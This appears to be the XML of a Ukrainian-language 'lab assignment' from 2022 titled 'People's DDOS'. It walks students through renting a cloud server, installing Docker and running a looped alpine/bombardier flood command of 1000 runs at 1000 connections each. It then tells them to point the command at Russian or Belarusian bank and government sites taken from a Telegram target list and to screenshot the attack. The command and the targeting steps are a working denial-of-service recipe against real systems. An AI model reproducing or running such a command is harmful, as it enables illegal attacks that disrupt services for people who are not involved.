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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Лабораторна робота “Народний DDOS”</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Створити (безкоштовний по можливості) віртуальний сервер на Amazon Web Services або Digital Ocean. Встановити на ньому Ubuntu Linux.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Приблизна інструкція для Амазон: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https://medium.com/nerd-for-tech/how-to-create-a-ubuntu-20-04-server-on-aws-ec2-elastic-cloud-computing-5b423b5bf635</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для Digital Ocean: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1. Заходимо на cloud.digitalocean.com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2. Якщо ви студент, і у вас є github educational pack (https://education.github.com/pack), то логінімось через github в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">digital ocean и можемо як студент отримати просто так 50 $. https://www.digitalocean.com/community/questions/github-student-pack-2 (тут є деталі як це робити) або 100$ по реферальному посиланню https://www.digitalocean.com/try/developer-brand-r?utm_campaig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">n=emea_brand_kw_en_cpc&amp;utm_adgroup=digitalocean_exact_bmm&amp;_keyword=digitalocean&amp;_device=c&amp;_adposition=&amp;utm_content=conversion&amp;utm_medium=cpc&amp;utm_source=google&amp;gclid=CjwKCAiAvOeQBhBkEiwAxutUVP7vmbhFnUYLT09ogzQy3oa3rctgAdSO5jqEMezBitn-McGJJ8OiLBoCw5YQAvD_BwE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3. Зверху у панелі  жмакаємо Create -&gt; Droplet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">s.  Обираємо Ubuntu за основу, CPU Options - regular Inter with SSD, той що за солодкі 5$ за місяць. Обираємо локацію, є сенс брати щось в Європі так як буде менше затримка з рашкою. Обираємо на свій смак.  Коли реєструємо обираємо захід по root password. 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4. Чекаємо як цей дроплет створиться і нам покажуть його публічну айпі адресу. Пишемо в консолі (мак і лінукс, вінда треба поресерчити всякі ssh клієнти) ssh root@публічне айпі вашого сєрвака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5. Маємо після виконання ssh побачити промт, де кажуть ввести пароль. Вводите, що придумали на кроці 3. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Амазон менш вимогливий до банківських карток.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Зайти на сервер по ssh.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Встановити Docker. Інструкцію можна знайти тут:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:hyperlink w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="598"/>
          </w:rPr>
          <w:t xml:space="preserve">https://docs.docker.com/engine/install/ubuntu/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Простіше встановлювати з deb-пакета. Пакет качаємо з сайту Докера відповідно до версії вашої убунти. Можна встановити, наприклад, командою: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sudo dpkg -i --force-all docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Якщо 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sudo docker run hello-world</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">не спрацює, може допомогти команда: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sudo apt-get install -y libltdl7</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Виконати скрипт:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597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for i in {1..1000}; do sudo docker run -it alpine/bombardier -c 1000 -d 60s -l </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https://wikimapia.org/#lang=en&amp;lat=50.584800&amp;lon=30.489800&amp;z=12&amp;m=w&amp;tag=516</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; sleep 15; done</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Після цього забуваємо про машину на пару годин. Потім змінюємо сайт сбера на сайт іншого банку або державного органу росії чи білорусії, який ще не лежить.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">писок сайтів для дудосу можна знайти ось тут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">https://t.me/itarmyofukraine2022</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> , також підписуйтесь на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">https://t.me/stoprussiachannel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (це офіційні канали мін цифри)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Звіт з лабораторної роботи проілюструвати скріншотами виконаної атаки.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="597"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r/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bitstream vera sans">
    <w:panose1 w:val="02000603000000000000"/>
  </w:font>
  <w:font w:name="freesans">
    <w:panose1 w:val="02000603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FreeSans" w:eastAsia="Bitstream Vera Sans" w:hint="default"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US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character" w:styleId="45">
    <w:name w:val="Caption Char"/>
    <w:basedOn w:val="602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pPr>
      <w:widowControl/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:cs="FreeSans" w:eastAsia="Bitstream Vera Sans"/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:bidi="hi-IN" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="598">
    <w:name w:val="Hyperlink"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="599">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="597"/>
    <w:next w:val="600"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:cs="FreeSans" w:eastAsia="Bitstream Vera Sans"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="600">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="597"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="601">
    <w:name w:val="List"/>
    <w:basedOn w:val="600"/>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="602">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="597"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="603">
    <w:name w:val="Index"/>
    <w:basedOn w:val="597"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="754" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="numbering" w:styleId="755" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="table" w:styleId="75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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-27T21:22:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-01T23:04:11Z</dcterms:modified>
</cp:coreProperties>
</file>